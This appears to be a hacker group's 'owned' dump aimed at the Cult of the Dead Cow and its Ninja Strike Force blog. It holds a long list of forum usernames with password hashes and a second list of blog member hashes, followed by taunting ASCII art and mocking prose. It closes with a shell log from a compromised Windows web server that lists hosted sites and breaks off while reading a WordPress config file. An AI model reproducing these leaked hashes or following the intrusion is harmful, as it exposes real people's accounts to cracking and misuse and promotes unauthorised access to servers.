-bishisht_np:0c0a304b162cf9a2cc488f31041bfd85 -Gamma:eaeb2c15148b1e235fd184e1807b2a7a -vioxis:0da2e7fa0ba90f4ae031b0d232b8a57a -Rush_898:9f7071bab5f97847ffe6a95a80aa52c8 -extreemuk:f25a2fc72690b780b2a14e140ef6a9e0 -Dericcolor:a63cd4a601fc5d72604da55cb73ca91f -RudeKen:f0e6510643892c92926401b685acfe2d -KODD:240fcacca707d1a1ff90085f83032565 -SevenWounds:17cc342adadd23fbc97d1a7f54800663 -alicejohnson:4cb6e1bc1eb09039c26367d3fdc2cc1d -Grozertop:021cd2f1ff639af339d29ed19d5c1947 -nano:691486f2d5832594131a2b02e2f5a3a2 -Poorleno:7e0b1d2401420daa12d94af247067ae5 -prinz_7:040eeae03d449d296bd1d99fdbf8ea8b -zanderpants:799c0866528ee9317d793e488a1e21de -coercion:08e433970dde880f509a39bee7c2165e -RoadiactivityInevitable:b866f72cb665b1c8814248de3758c045 -soulsick:c41699937833000d7bfd36fb3f16a1c8 -six:7b8cfe413207bf4d5332085192fed58c -muneer:e10adc3949ba59abbe56e057f20f883e -TheStampede:0258bab945cd8f9d05b08cc159744a2b -snowchyld:aadfa036f925dd832d21cbcba57fc2e3 -Acid_Reign:fca9a1883ae7ff186ff48ab5453fb90b -Chibbity:a37fe437ced472d35e0e5d28ab0af408 -Swern:e765dc5e9738f36dbc2c3f4a331d5140 -DrDeranged:4a69d3959bacd55739ba2e98853c97ba -Ghost_Who_Walks:8f233ec2b650159be2f3303cf8ba7796 -belial:b965e020c213bdd247a6287876b448d8 -rushkoff:4153203a4623b3b20fd483de784dd18d -gilemon3:8797f38ef87f6ce1eaffdf3762078f61 -teque:f6df47c89653e878697ec5b4319b1533 -SansGrammatik:a1556ff15358d17d5aa1adaaffdf430d -delrio:d7cef6a56574d636a6ae00a2fe8fc73c -lcypher:52db1682266f596f5815334f6760acfa -Robin:34b551ee7dbf9acc44eadda3e10b393a -schemingturkey:acf766297ecc6fd1494d91259da10a18 -rahuluu:251118856aa7c2bff103d76e7eae1f45 -malbojia:4af7b7a62be43bab0b698998851b0c20 -geltab:ae342f39c7720447f7c35f6f037cfd1d -christoumarseillez:4a1713c688496d5373e70bd2c98460b5 -DogManX:880dec224a10ee15cb819c8bd244cea7 -Justiz:1bfceed2afbf0265d2428f6b080139a4 -sailorgloom:9c381d06e72abb6a6fb05ceccf118b5b -screwy:bf4b3ba0692b4378406f3df1df1e326a -viriimind:dd0d99271efd5953f5f08a835d91b88f -Rubber:d637576ebb09eab47c83f1dbf3ad7972 -h51615:ab3d2aaf3d4423f83f54645eb33a2877 -sa1tine:58dfde2799aac0ccf0b23d1e8b0f4752 -na7as:1741c34281379406b4fd6b9ec69ac81f -Harman:8ff30af33e32f773d2cd2d2c958cc054 -samse:4330129fe3c1e9fb410741533da6618f -ChriSat:8dbdf5d5339e435226ee5b79afeb7bfc -chaung:e10adc3949ba59abbe56e057f20f883e -billycuts:476efdd8dd9dab8b346dfc1d22ec29c7 -zokah:c6c8593f16cf1651e862c6e444b15dc6 -kastor:8a56fa16266271b552ac7c5678e24c46 -Pavel:fe94107548b9f5e280f4346dd7a7d03f -plug:99061470247d0340be0788e0f21474cc -Shadowflare:587bb16b7ae57a697c5381b20253e80a -hardwyrd:c60afd32c0ad335763f00411aba990b4 -troll518:0ffd67f868fdab15e12d077f2da3876f -Flywood:f74613c046b66695696a321d90f2eb3f -jangkrex:316d3056081339f0ad2f35354da05183 -ninjaleet:84c19e7062a25e9838998071aae2aa7b -DickHertz:80f72dd90ae2a71270a4d010aa9e7c44 -HeIsRisen:78d7e2d20ec7541252fadd2e4fb3162d -xa0s:127f49f2c964fa21b99458ec59842817 -scalefree:f9881c91d36717a9878dd169edac5672 -DocChaser:eaa58468ceb1203ec422bb4af8561b1a -ReZEN:40f6262b9a90019e291a3774d2315ca0 -F00m:3b04e86b889e4792f1aa51a15531f71a -flask:7da7cbfa8a060991a3682a8e883b3ff9 -GrahamPhisher:c929463d2cf8d417a56b9a0524a0ebdf -cx42net:acf2796256becb991c5b2b3ff40c0677 -chad:1d77a20dbda088c1e893f29cc974feea -jacktheripper:3837c2b633a831ca50d2e8b2321c741c -bwerner:6a204bd89f3c8348afd5c77c717a097a -SagGarcegyday:332f9f7a7daf08b9b8f07ccb86a42e3f -archi:63bc0bec3e00968b2293b6ca6b6bf499 -ARkley:4265e70e9eaa99ef96c38e482b7b4761 -leatherfaze:fcea920f7412b5da7be0cf42b8c93759 -paradoxbacklash:9dc6bd14b709c1f4e08b515234e59098 -andrewtheafro:2b6fdff716d3fed734502e7bc65c5ecc -mvanes01:400eec92094fcddfeac1761c785deb37 -sampsonboi:97d90faa37d6d2757fa4e9d9e65afe52 -StaticVector:2fc50061eab80605634a9c99ee7594b6 -cooper_1977:cf367698f65e5038c6b0cfcf33edd8f4 -zenmaster:c0f847ab45f597bfd1ab6fdcba319db6 -cy:6f05e85f2a88de2bf016d57987a4595c -baltika6:bc470cfbe58d637fde37324162137d9f -Kinglin999:7ec7ccc2fbc7d31fca00d0d3159af905 -fartenmonkey:89c46eccf79e9548a5dab804368481b2 -m3rk:5b11f068cec4cb6d6e6fb47f5077269f -Epaczlcb:35ae6dab1373f596d96bc7cb8f43dbd2 -oOgerryOo:4473842ede1526264050e429b6f2271e -hacker2021:167d3591d47e65671602f86c432dbbba -actuarl:471e8cbd40a5d828a09150d0fd9f1a5d -burnit:eb4336e31340ba6ff2d9f0c45ab07a88 -Ojdrbmbg:bcabd32cd7a3787ecbd0fe069d3a91ab -Opepayerror:091beb84d129e191998bc6c09c4f1486 -ReusiseattBig:5aed96f6e496bd0bf35d162d5a10bdb0 -HenryChang:f9c20f426b015a6f8e2f215fdebd5ba8 -EC44:8672c1a2e77c6595ba0bcc793e611f92 -alfredtaniypnx:0569d6c775212e92293366bfd2f6fa80 -venushius:5d9e47433afc3de8967ec39421d64078 -feequevem:26128f7d10b61bbb39c700072a7771f4 -asyclaphync:48fb0abb3c97dcc83595a15fb9eaae27 -Izkahnfr:f018e2cc47aa1fccb0f1da3ef4bdf0ff -Itenttres:3f3a2d64926340cff5e3c5ab80833bec -enambanis:206dbce7f6204c30ab1604b835a7ba80 -idrinkyourmilkshaked:cef5420d5421669cba8617300ad11f4f -wdryug:3fdebfbf42ebad51eb6454f379ffe34c -Czrzftmz:5faeb7296ebbf3f7901f129be48ea9f5 -Cheeroise:194cd3a7d983b8198367116a4f26aa62 -Laqswrnm:700397983839bf58a9f298972bec7847 -Hltwejhb:6f9c54bd4c6ca96362be5ea989c73abf -BoxVista:49dec5fb8af4eeef7c95e7f5c66c8ae6 -rolexstyles:43c5eb4cfba586c8336fb4eaa404ccec -Setexessy:9fba4c9cd4242f8393d77dc323caa72b -Greefauri:af3350265bd2c8b14d4b2ab9b39e6921 -mestizzo:4ef263dd3ef117f5dd81c284fbbbcea2 -Orestegooto:d758487ba3b90f80f81bd9460cd8bd58 -jlukmagbvv:58c8ed972161abd5a17fae80ee58fe09 -gensazdtvz:58c8ed972161abd5a17fae80ee58fe09 -Grzqbmhy:74638d69de72e17801399ad3b5423156 -hausNaist:c3ad7606c6b053ffb24b16e9ab20a45b -Niptspouddips:1285411acb518825dc62037e7548e34f -Lkemybab:00eecd135360c25a06bd7ab64d9b7c56 -vechpayt:e1cd83dc06c128a1bdb68deeb35b3043 -nojaadalpy:58c8ed972161abd5a17fae80ee58fe09 -terPiseerom:3a66177c8e511f21e320a13928ed448b -Txaizdxx:7c9cc5693ba59e0248fc05fb7f372fff -clilmindy:39d735484e2d5565a4ee5a3b7914e716 -Zsjjwfrr:70160d6d811869f05586b02fce0c23f0 -Edsonghw:d18dfc7eef7be0e8aa750320ede6575c -emipiepsy:4ba9618473af5cbcd1bf9fdf75826f3c -Nencenopeestev:495b55bb3e4afae400f0c99cf50e905c -jarharnar:b071e8a72de3cc3661422cb93754175b -goomuloo:51c03452e10a4ad858d6dfee98cd3177 -syswenya:e1cd83dc06c128a1bdb68deeb35b3043 -PitViper:113952ff5f3991111c393627920f4909 -neertrorkah:1549ca5b3a3a980e48d54855f1992476 -Udxfcwdf:b07b70979de143b8c983cfb9a871723c -BahycuTopyk:ae62e6f3cdbefe355be1dcd0ac9c7c6e -limp:6f1daa3e9ff5667c1498003a4d75cfed -Seannapoowher:29962a311ae69a59963446fcb6e62edf -Rosoooabelt:6edb4216ddb22dafc74c8516be090222 -devil:162c6f09b8056c43a27126eaedb55e8d -Cwqlcwpi:a1070885e800c9490ceeba490f067714 -Gcromqgb:b1f25a6df45281876e07e76d98dc1540 -mrivru:5b5baea1524cf6d3d2037780d7ada0a2 -dvmnfsrjea:58c8ed972161abd5a17fae80ee58fe09 -FeceMycle:c3202f338757479e79f99c66e8f6d0cf -nupsElene:1b3d145656e33f7f9f418313c337506d -Woziwfaq:992398af70ddff89ff1ac704f53de16e -glued:b26def75b1b72cf1c2ba1a10f6a3d17f -Embalty:8f8837b0a5ffb5e054dc769e81635548 -Nqlncdqy:0842cdbbabd214069e5c660217a1ce72 -Jasonstawnos:60a1df2f728ac34d77472dfc6a1ee54a -xpiqayptub:58c8ed972161abd5a17fae80ee58fe09 -expressorder:a84d7b154314a6b13a83ee8248e8c471 -usernamelistingsus:8945b4cb1bfb8cb5c95c137fc60ed9a0 -Nwxffgke:28dd4a1916649aeb88f5ae43aae0b16f -Mvgandko:545050ede4c370c0cb84d4cecbbf6303 -Zamandella:5150ee98db20e30f98be66c07e177fca -Tobkptto:7aa06529fa2fec91164ef926a23103ea -agestsete:0c2c8e231e229ae192d1f604c4f045e4 -Meampnampsync:81e249f2f76f4a902ac487dd6c3dc654 -Diushcaus:6f698f165893e3246f05137deac9ac94 -wirewadh:66a9935d311cb6e489d00b9f6767538f -chinjamacil:6a3f8c693e6241575dceae019f5798ad -tulakalek:b071e8a72de3cc3661422cb93754175b -celticnecioso:0b42330a5cc3aa2d053c8283dcad3799 -paman:75fb90ccca0608d7e97f710c2d182e87 -Pvfcadbh:376a199dc67f7ca58e75a7f89838dfaa -Eeawmgik:9291fa8260cb67d8904c6315c1cda5a7 -ujsqobguyg:58c8ed972161abd5a17fae80ee58fe09 -sxvemkmjcc:58c8ed972161abd5a17fae80ee58fe09 -JohnnyXQ:817d8b18457450e86fa79a378ca74f8a -Emaippima:469bbce8e4873944dc40ea08f219dcae -Evwxjgjn:475b2a5b3cd5c40ddb267d1dacf63794 -Ahmtwiii:391f98c0884df8172afb264a48081d2c -PlanTaleks:c6e37e891f89567d183694ce7e7c904e -bumxumer:af7c73a6a44ab885ad0ea38ce771e86f -IgorMcCain:39b55d1425700c845423fe50c2883e23 -KyzyquSicuj:c523360f36f9f7098223d3ef1bfdcc9b -sileDuetAutot:a3dcb4d229de6fde0db5686dee47145d -EssenceRec:ff1147ae8e4bb68d7e594ea4d4d035ef -elileleds:eaeea788ce3714a21da6e24a2e66943f -Terrencesvz:5fafd4b279198d97417869d64872efea -Pelxolar:cb0c6ef0ba6b82531f7c9532480818bc -Proprietor:403998fad04c4e654e645082903e1cfb -sylvania:b4b681fbe8b370e2870e38e1e89dd69b -cruiseswf:b5cb5378ca4bf56980c0f230124d944d -Carlinazxx:9213a76e4d43406a8b9c59c898d16055 -anexyengank:aa1dd8fb6fc0b374e4b6ae20c3b69ef2 -VepKableFaF:c85e0f6b90cc84fdcd155a34119e9051 -pymneffence:ede5bae23278a988cb607f2d10891971 -ingelibreesia:932f9a32cdaa33ff15e759366f9599d8 -DogaxTisylo:0512b9c8c7cc3f97664426653a018af6 -Puartekianezz:12ff160db0f59219b329eb297d448b0d -disciplineHC:427cfcf3ec4976e13e28f977fb791473 -kibet:df53ca268240ca76670c8566ee54568a -N1GH7SCRY3R:f951bfabb80ab8336a6af88ef6542647 -saintmichael543:2d4df5129565c8b1502dff7c1e2cf9d8 -Candor:a460f2ef6b438cef6cf420cdbb5f7a24 -Fksxneng:84260be2f4c47211604c89d3917ec4e9 -ggdesc:191c2392a09fd78347751e881f95ff50 -Jxkitxuu:757da86979d889655638001914981c40 -usernamelistingsusk:8945b4cb1bfb8cb5c95c137fc60ed9a0 -Moftaffiz:9287f59186e762383e49d85e95d720b3 -Qmebgzaz:a1b78efe1d968ec0939b72338f9925f2 -Rortithrounny:1b9489603998b1eb6f89011dc7699e6e -Ndptbudd:04dc94c3c8ec7081cb65acc0d4a3447e -mamibspoivac:1a9d34a1789b1a6fd83a3288a309c24f -butigioi:493de4012d663e23f15ef00a84b22165 -Qbmlztdy:4266f0e69423bcd07ef009dc5826ced6 -Mooodcze:85a8231f54a592d05fa9aaaee75af540 -FiksatiDyadya:6a39728b44b4ceefa9b4fc5738737d4e -jiliaBiosaups:0f55ac36dea067850b19288e2f7a5f91 -Jqwmbihz:b5e56d0ea5e30b80005a5e53049cb957 -brightonsmiley:6987cd1a52655b6f830746ecb52e4254 -igimugii:c6858bfc4d5b61b3037f8d472c3a1b4d -datingcrew:4ffcb41a55d4ddb32a87334d3de24936 -jimmycougar:6b410bc656f687416ca717ff7f3adf57 -kpofcycljj:58c8ed972161abd5a17fae80ee58fe09 -Ensrqcvx:4d056b58b922eca32169635cb2e61e70 -Nicihntm:17bb6f24d7c373a906ef4e8793b6acaa -Axbkpbmd:d31ff0d73922a54be25f40468754153d -Kimbystymil:d482ffb70e110018e90325fe3dc62f2a -Zhpfncnh:678a81f3f74e30c80d3fd7e9157e5ab8 -diebradrabdoblea:2880b4de878ee185b817154e6eba0bdd -InfommaBymn:94ed49497346e14c6cf954d51ba8e7db -snezoriayb:58c8ed972161abd5a17fae80ee58fe09 -Drdccyoi:5c3f15ad201c8bb1bf5ce4cbc796d2cc -Pimkkmya:2e6c99b2dc22f9bdc0740524b7733ffe -jpdanis:cc6fda6a88ba5ac8366346577076ff1e -Shikaka:863dcf76708f2d0efde7fd5f5df81f04 -Tromebroard:3c1b633ba4a80d42d40b92d2ad7fda66 -Seeroideonrak:a8abddca4fb159b3e0827a2d43b3cc1b -inittinnykige:61ecc73f0a012e1b05bf1cb42675bacb -FNeroGmbh:6e75cdc6fab0686e7ef51efd3c1aca56 -Awaitteintigoas:ade5d38e0da4a8c946de2dc2529de7d9 -promodownload:7d54a9a9010ae369bb5458b007c44e82 -Cgvizega:922b7cf17961831842ce7f513a79e40c -jeodelarryild:865922516243a0c9b62c5ac59539240f -dero:994f94eb24f4a350859e8ba0d131ec37 -ZybanProff:8b18cb9f624851c3f97852d16da3330d -Qwjyrgij:90fc95a80e443a99930f441be996383c -duesthuff:9b588ed8d1525b3360e9d8b9bca3f283 -Dwornikkido:d2be6586c4803f9c1f0480e6cf818655 -Illitlyhism:a47dc7dfedf43aed6954c64b2aac4d8e -velichay:48c150504fdda32d965df704fd81049b -palmada:054f17223722eb4a7962699074d3adf6 -avtofromusat:6c03d5ab22dc86fad3ffee7238583889 -OlenkaMinskaya:0286d819357b22a09878455bc454ba66 -Twyoovkm:1a597593b7ce071992d898fb80bd5921 -Qxgjimwu:57aa34b502bbbcdff2e118f9b130d804 -sevendown:58818d8ec608cef3a5cba253bf2840fe -Aqgkvwzm:e72b856db84874448274113b2ce6f2bd -artkolkovk:6a516a35cf4e9a17d144e02512d2e5c2 -Clsisdxi:2a111d22195dd87cd8851f220d4946dc -epedrosjan:8945b4cb1bfb8cb5c95c137fc60ed9a0 -Mc_Hitler:11aa480af687aa232faa32106c114af7 -creewoccult:f52fbba230e56dc2fc7ac22c6fee96ed -Ophycxwh:4ef0aea59d286ba9d4dd554fb1907156 -Rnlvifov:bfdf833bcda0e13921736e77b06d9aa0 -leftnut:3a713808eeaae915bfc180c1df3c05cb -slellafledown:d1a1193df848ce318fab26d96424f8d4 -Lljyshso:9384e69b7d34377af1c1e96c67f36940 -Wkhigfzi:4f94c3d7f5e69c9b6becd487d2b8f226 -Ctkyglyw:baf72e5219da4c17a61fc45def103098 -Coerhathose:2043ed17783019d6b4c44b3201206e69 -musollp:364b23a7246967db7868490b9e0b29fc -Zowcwrzf:57d6d933f11bc10006d49bdaeb21a21d -Mjxhnapi:e976cfa5170f8bf1f0372e2ed615c345 -Jadldqys:8ed72ce7a3191212573ac3abaa7e78eb -Bannyfuns:acc1a9345972d4df8002d4a153bf9bfa -nanikulila:8d3313b27ae3535a9b25ec82d180a95b -Vzkdgdqx:95a8bf920fa071043ab4a3f044b09a61 -rhettzoiefdw:411faac283453ce6dc4311bbcd296580 -Xbcofega:7523e33d4d84c16d49cb25543c8e6ef9 -Uokgwjfy:09a2243d2e613b89240c18db317f87a1 -SERPENT73:e6dd65880857802cd3d28ef67b35b8f4 -Yrealmale:ac368b6c69e256bf287b76c75838424d -jjkjkjjhhhgbiikk:bca36eaf3e79d0e2308b846721895cab -ChulaslavyBal:7e79d9b311eace6177a9d18caf3fabb2 -runineC:00bed7c0ed299a727d4f0a6c471a462b -Pcodaygs:0f7c973a0a1db803c04c2c8a36866406 -laulnek:49e852ffc0b16f1c515510ced180998b -Wheegebes23:fde1502cd3de65917e5f8790a26d2f0a -VevogWugyky:011e88f8af27f1dc913fb9edf242ee32 -kmhmuiixja:58c8ed972161abd5a17fae80ee58fe09 -Squgsjmi:0b27379ba0976a459084c122e8c95968 -PheseatFles:d94980fbad7e0b4ca1df5fab84e72798 -p00rmans0ul:e033deb43844c86f33cea1d8282c25b2 -Wckcvhsg:70f28210fc3703ac59ad23f91d2607be -songfanchick:8945b4cb1bfb8cb5c95c137fc60ed9a0 -Rubxlwex:f68f7b58ab57d6813bff5d30e9367691 -Arerurgeanink:76cff5766dc34d8f93200ea2e6268b66 -Ekznmijw:467e97ac276211f3f7849851f2eb22d8 -Nzkggmdi:3a9328aec754112db243758a3a554d8e -Goometuippili:fad0d6d81f587ae5658235c1eafe21c2 -amandaronnerr:0b3badfc87f8b08b9cab634bb0b7db1e -aliplyalusity:81a1d4983a74f74065fcc48cae6dea99 -Gmvkgkmn:2e49ce5372cf58502d9182e3bc2025c4 -kenFeewLest:18b6f3d19bcc5fb949ccb649ebce4f6e -RealPrasto:691519933a9de31dcee44f52461db0ec -BilokidafurMona:ff9699aef82f0bc4d573c3b1f7a14e2e -talivali:af7c73a6a44ab885ad0ea38ce771e86f -Josephsml:16882a60932da7cadc7a6674b2606570 -BlincsersBync:cb572c9f55143058d1cc585b5ee2376d -Rffkwfct:6ddc7596f0657e8611df7a2b3b95b817 -itaccangact:530c96877de84255d41c0c89cb6ece69 -Khcyhshq:2e0eba41997696154960f8f809282ffe -Dulmitunlinly:f8d52b9612dac66c2c3a97e9d84c61fb -Bzendbxj:cc92c6338ff5f8456e531f01397210d2 -MewayMymN:65a90d2eeb67fd1da51774f542673a72 -Oseloeiy:fe77ac4c26a94c76202bacad8c231bf2 -Impongoro:94a77e4d29a6e2972b03e031c831b2f5 -Taiquinaime:cb3efb42bed4bf6be3e2f9cc6263dfcf -ValeriyaDemnikova:536072bed03732b472b826956477e6c0 -arremiJes:ea35e02ab8d29277c0d0acba4d829f98 -plweget:7e67846d3866790001ded1b407f6fc4b -Koayrbzh:b6fe57c2a94be0aa96eced069738320d -updable:8fcd5e9f25cbf527d114732c4fa51738 -Juonlylg:1ab193ac79e6dd8d49f63f2abc52bcad -dirchepag:0682c5cb2bf92460819ac35906ea2872 -Pmmribez:94e392ed1271e4ab432ece9634e0143b -Turk_:d0970714757783e6cf17b26fb8e2298f -theimmortal:0b9a54438fba2dc0d39be8f7c6c71a58 -Vlzeyysg:9d9fb03fb42ac9cf180de0f8f0662cf9 -natalyywonnderr:0b3badfc87f8b08b9cab634bb0b7db1e -MeequeGreriot:1fc18087295dc06da9c32077fcaa481f -Fizdulcl:119eed2208232d6eaf19173cc290a2ad -Hnbwooml:24f3ce4733f7c16f9d837570018852dc -shalashul:48c150504fdda32d965df704fd81049b -mattqatsi:10d85d7664a911bcaec89732098c269a -FedorkaSinn:b4a3fdabcf1ec5d31ad2eb2a74848fda -fetusgaling:0b9a54438fba2dc0d39be8f7c6c71a58 -ElectroFun:a305fedfcd5a179b122c7c133939745c -Vvadphyd:8366e575b511877fdb154a480bd528e2 -firstmestofirstmesto:f55f0a6970f4f8dcc0a301214d3d4034 -Njogfzgq:6ff229641d067453e565cb7fcc1f02b0 -jaylinleonaqvy:0daedfa8c999d688037787a5c45e7235 -razkrutisaitrazkrutisait:5c11d68067b4998043d703d1652179b6 -sdelayseosdelayseo:ced3374849437542656e3dfdbc66a39e -Navpitmx:4bae331491749e3e46311b8223f47c3b -yAlkaltbut:87a061565dc389593d9a13754fe43b1c -astencehake:1dada3d6f4c5642532666fc7b2298f56 -Uzyebyer:b7c2d96cbd154aa676833b6ff364271c -catsmiru:9a6e9876dd42d59fe8a8af2e3c19fc31 -VapseligesOlex:a57852995022880e285172d68d29a021 -Entjungferung:9ce44f88a25272b6d9cbb430ebbcfcf1 -Dwyuvxap:b095b633963f4795d935bfe51d2c5df5 -Lfwnnvls:8d235e0cc564de77069703ba18440bc9 -Ovrnlnww:079550805fa3ce367fff0439aa2504d6 -Yovyulox:65f004bd10b75678c5e8b5ecaa1871be -Hhwrubzl:2a22b9132779ecb649f7b7e818588068 -lucyleja:40172e978fd00427e73b60e9e949b7a5 -anrchied:afb35003e45a6fae375dd767530f6d55 -UNSONSOWN:f05536fa67a1ce415220423a9c891e06 -Knitesenuatte:d209b31b586dd1be1581b8f8c36f668f -F:ae806bae2c864298c21cc351692706f9 -domiturdaitros:f10e7976b595b90f8dfcfd234ed02faa -Wwkzozey:ef63c110f68d89d734ca6abd43652687 -enjallow:1541133f937198369cf505f311bac868 -Zlobniispamerssss:db695eaf5c87b32bbf4881102ba95d21 -go_initistKats:5d83c91a674f60331ef1a776e19381a8 -Qzmsdoem:918397a7f4a80ce33737a6352e7c7446 -Mzvxqlmr:1e20788e9a28cf2e1d27a8f6d99b1e8b -Aztegjpl:7d11f7005fdc03e4e0633bab2e47b7a8 -MaxeNajy:c0e72a72b16fb1f5c6fc727c0b19dd0c -Thomasaqu:5fafd4b279198d97417869d64872efea -blurgissins:8f9407a9064399d26ae3360c51ec1513 -Zombinassogrut:db695eaf5c87b32bbf4881102ba95d21 -Pelceghr:c7729ad3c04328149f68c0e927afb78d -XRumer92:71a14bc59361bf3923b6f3dea2557f0f -sigrag:57ab72e7a8574b82580e779aef15aec3 -Gzfhfekc:2e9855f7c32a12496d2f6c690b858217 -addisonnicogel:d55cb31be4890abce8004648e2584f20 -Roxanjbra:8945b4cb1bfb8cb5c95c137fc60ed9a0 -Itammeneilutt:f8aa122d5e020b2ab948a5134aadc29e -elulgeeveda:ade6e4bf63550fa71b6cf831b4d8ac3f -PujucHub:a7763c2b2e65a2f8dfa99866b67dafcc -Bxbhtjnr:4a52fcb243825326938c122eb9a0696f -gphxkpvnee:58c8ed972161abd5a17fae80ee58fe09 -shoesspell:c5ebdbb35d7d3b23baf48209b8a30442 -Zuprexin:39cadb57b4503c8fbd361f27dccdfe51 -abradurka:f3a51c3a24abb1ed8016ea85173d4358 -Jznvtewh:426104cdaa40a1bd5b1f4d4078fecc6c -HopHoackfax:9b588ed8d1525b3360e9d8b9bca3f283 -Ltftujkg:8b6f8a4deaa6dbdaffe334f39f497abd -NeoplanetariMan:a02e1e4e27fe6bfc0ed4f0e5a9ddbd69 -Lebeidulikar:bcd8f930f9f8d4d2c7e2d3a324f7d7d1 -blackeyesavage:c6943e764b46c1c95fa6dd19904a055d -ThomasVY:7105cf3938d73f2bdac51310aed36b47 - -CDC blog hashes - -G. Ratte:CFfFcLcUZle/k -Tarkin Darklighter:xzPKiWz8QTXvk -Count Zero:1X/noJiJmuDo. -Hella Kitty:j8jv.kfrcfeFA -Sunspot:gdO2ytGEpOytI -Reid Fleming:DtDcPtq5zQm2Q -xxxclusive:ve1BSQJQTw.5w -Oxblood Ruffin:1LdqfLrPwVX7A -Krass Katt:VCF440Kz/QesY -Dark Sorcerer:pEe5gI/W2furI -Myles Long:t3Ky34tLMlSwA -Javaman:PKrqiDTnqCAOQ -assrabbit:LqNmR9yVnFW.c -Necrovore:R9baORRE/MAFo -Omega:uGW2BF8i6CYUw -THE NIGHTSTALKER:2Q.RTf3XxTyuo -Dil Dog:gKrFNEzeE81TE -cDc communications:aAwVhjTDJY94Y -Deth Vegetable:z3/lohkRD4iSM -Obscure Images:B9Ayyw7aM2N9g -Carrie Carolin:T0/tbH3MtuTaA -Tweety Fish:kxxDeVzQ7xG4g -Drunk Fux:mYohCcCA49feo -White Knight:uPDxxVSZ5XyaI -DaYuM:JXfb8NMPyJc96 -G.A. Ellsworth:wmnAbTjll5SCs -Mixter:W8i6Hq3WR2/O2 -Lord Digital:F8kuHzTTuIguc -Sir Dystic:6nfgVLh7RH59. -Franken Gibe:NuvW9JdLi.dFs -Mudge:ao3Kxv2Y05MeI -Tequila Willy:IBxlxRuzhqAGg - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -Ninja Strike Force - -Wow, with a name like that you'd be forgiven for thinking that it is a ELEET -special operations team; members consisting of people with the same skill level -as a Bruce Lee / Schwarzenegger love child. They are, in their terms, the "mighty - and the chosen". It's the Cult of the Dead Cow's most eleet of eleet! the cream -of the crop! the best collection of _hackers_ that they have collected. - -"Membership in the NSF is granted by the cDc to those individuals who stand out -in their support of the cDc and its ideals. Members are recognized for their -abilities, capabilities, and being the best of the best in their skills." - -We don't really need to rag on them, they admit that this sorry team of -self-obsessed bloggers is the best they have. - -As you look a little deeper though, you figure out it's hosted by Flack. Now -Flack is an all-around nice guy, he can't tell a lie, he has no scene ego and -he isn't a hacker (he even admitted on their secret forum that his box is -"probably" ownable). So why the hell would you host your stupid site on his -webserver, relying on him to secure your ninja stronghold? - -Anyways we did own them, and here's their shit. Oh, before I forget, it's a -Windows box, so the hack logs might not be too great. :p - -$ dir C:\ -C:\ -23.02.2008 12:44 1024 .rnd -24.02.2008 13:43 <DIR> Apps -19.03.2006 01:34 0 AUTOEXEC.BAT -19.03.2006 01:12 208 boot.ini -19.03.2006 01:34 0 CONFIG.SYS -18.02.2008 19:22 <DIR> Data -22.02.2008 23:00 <DIR> Documents and Settings -25.08.2006 17:36 <DIR> HP -19.03.2006 01:34 0 IO.SYS -19.03.2006 01:34 0 MSDOS.SYS -17.02.2007 08:03 94720 msizap.exe -26.03.2006 09:26 <DIR> MSOCache -24.03.2005 19:42 47772 NTDETECT.COM -12.07.2007 16:04 297072 ntldr -03.01.2008 20:44 <DIR> Path -17.03.2008 15:04 <DIR> Perl -19.03.2008 14:11 <DIR> Program Files -07.11.2007 18:49 <DIR> RECYCLER -19.03.2006 01:40 <DIR> System Volume Information -09.04.2008 13:48 <DIR> Temp -23.01.2008 16:29 <DIR> Temp_Console -15.08.2006 22:42 5048 TMHotFix.log -04.01.2008 14:46 160876 TMPatch.log -09.01.2008 19:40 <DIR> Video -29.08.2006 21:40 <DIR> ViewSonic -14.04.2008 21:06 <DIR> WINDOWS -27.12.2007 16:21 0 wizard.txt -19.03.2006 01:35 <DIR> wmpub -19.03.2008 13:47 <DIR> WWW -$ dir C:\WWW -20.03.2006 21:39 <DIR> consoles -15.11.2007 11:03 55 index.php -19.03.2008 15:09 <DIR> logs -20.03.2006 21:38 <DIR> ohara -20.03.2006 21:38 <DIR> programming -15.04.2007 18:03 <DIR> search -20.03.2006 21:35 <DIR> starwars -03.01.2008 20:19 <DIR> surfstats -20.03.2006 21:35 <DIR> tbh405 -28.03.2008 19:36 <DIR> temp -26.01.2008 16:08 <DIR> Webmail -24.04.2008 17:58 <DIR> webmarks -09.01.2008 08:19 <DIR> www.ezridersokc.com -14.02.2008 12:40 <DIR> www.ninjastrikeforce.com -04.01.2008 14:39 <DIR> www.okcinsider.com -04.03.2008 16:47 <DIR> www.patloisel.com -17.04.2008 10:29 <DIR> www.peppermintfairy.com -09.11.2007 09:04 <DIR> www.review-o-matic.com -24.04.2008 17:54 <DIR> www.robohara.com -07.11.2007 20:38 <DIR> www.tlpok.org -07.11.2007 20:38 <DIR> www.traincor.com -20.03.2006 21:30 <DIR> yukon -$ dir C:\WWW\www.ninjastrikeforce.com -16.11.2007 18:12 3262 favicon.ico -19.11.2006 06:56 94 index.php -02.03.2008 20:34 15407 license.txt -29.02.2008 16:09 7638 readme.html -21.01.2008 15:18 <DIR> temp -09.04.2008 13:50 <DIR> wp-admin -17.03.2008 21:18 32776 wp-app.php -03.08.2007 00:45 129 wp-atom.php -21.02.2008 22:55 1026 wp-blog-header.php -04.02.2008 19:27 2919 wp-comments-post.php -03.08.2007 00:45 153 wp-commentsrss2.php -24.12.2007 05:34 1288 wp-config-sample.php -07.11.2007 20:31 947 wp-config.php -07.11.2007 20:35 <DIR> wp-content -03.08.2007 00:45 851 wp-cron.php -19.11.2006 06:56 120 wp-feed.php -26.04.2008 23:33 <DIR> wp-includes -03.11.2007 16:09 1529 wp-links-opml.php -26.03.2008 07:43 16383 wp-login.php -29.12.2007 18:38 6077 wp-mail.php -18.09.2007 22:23 296 wp-pass.php -03.08.2007 00:45 190 wp-rdf.php -11.10.2006 09:26 251 wp-register.php -03.08.2007 00:45 127 wp-rss.php -03.08.2007 00:45 129 wp-rss2.php -11.03.2008 08:45 14292 wp-settings.php -28.03.2008 06:51 3123 wp-trackback.php -14.03.2008 19:08 68155 xmlrpc.php -$ type wp-config.php -<?php -// ** 